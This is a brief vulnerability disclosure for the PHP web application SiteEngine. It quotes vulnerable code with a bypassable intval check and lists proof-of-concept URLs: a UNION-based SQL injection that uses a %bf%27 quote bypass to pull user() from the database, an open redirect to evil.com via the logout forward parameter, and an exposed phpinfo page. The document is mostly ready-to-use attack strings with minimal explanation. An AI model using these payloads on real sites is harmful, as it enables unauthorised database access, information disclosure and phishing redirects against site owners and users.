siteengine-sqlredirphpinfo.txt

`Due to incorrect use of intval function, leading to the logic of inspection parameters can be bypassed, resulting in SQL injection vulnerability.  
  
-=0x01=- SQL injection Vulnerability  
vul code like this:  
if ( intval( $id ) )  
{  
require_once( $site_engine_root."lib/rss.php" );  
$sql = "SELECT url FROM ".$tablepre."feed WHERE id={$id} AND uploader='{$SESSION['uid']}'";  
  
POC:  
http://www.test.com/announcements.php?id=1%bf%27%20and%201=2%20%20UNION%20select%201,2,user(),4,5,6,7,8,9,10,1  
1%20/*  
This vulnerability exist in board.php   
  
-=0x02=- URI Redirection Vulnerability   
POC:  
http://www.test.com/api.php?action=logout&forward=http://evil.com  
  
-=0x02=- Information Disclosure Vulnerability   
POC:  
http://www.test.com/misc.php?action=php_info  
  
ForFun~  
  
-=EOF=-  
`